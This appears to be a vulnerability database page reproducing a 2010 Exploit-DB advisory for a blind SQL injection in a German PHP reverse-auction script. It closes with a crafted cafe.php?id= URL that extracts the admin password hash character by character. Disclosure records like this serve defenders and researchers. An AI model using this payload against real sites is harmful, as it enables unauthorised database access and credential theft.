phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection Vulnerability

vendor:

Countdown Standart Rückwärts Auktions System

by:

Easy Laster

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Countdown Standart Rückwärts Auktions System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection Vulnerability

A vulnerability exists in phpscripte24 Countdown Standart Rückwärts Auktions System, which allows an attacker to inject malicious SQL code into the vulnerable application. This can be exploited to gain access to the database and extract sensitive information such as passwords. The vulnerability is triggered when an attacker sends a specially crafted HTTP request containing malicious SQL code to the vulnerable application.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries. Use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection Vulnerability
+Autor : Easy Laster
+ICQ : 11-051-551
+Date   : 08.05.2010
+Script  : phpscripte24 Countdown Standart Rückwärts Auktions System
+Download : -----------
+Price : € 159.99 
+Language :PHP
+Discovered by Easy Laster 4004-security-project.com
+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.
  
---------------------------------------------------------------------------------------
                                                                                       
 ___ ___ ___ ___                         _ _           _____           _         _ 
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|          
  
  
----------------------------------------------------------------------------------------
+Vulnerability : [site]/auktion/cafe.php?id=
#password md5
+Exploitable   : [site]/auktion/cafe.php?id=cafe.php?id=1+and+1=1+and+ascii
(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
----------------------------------------------------------------------------------------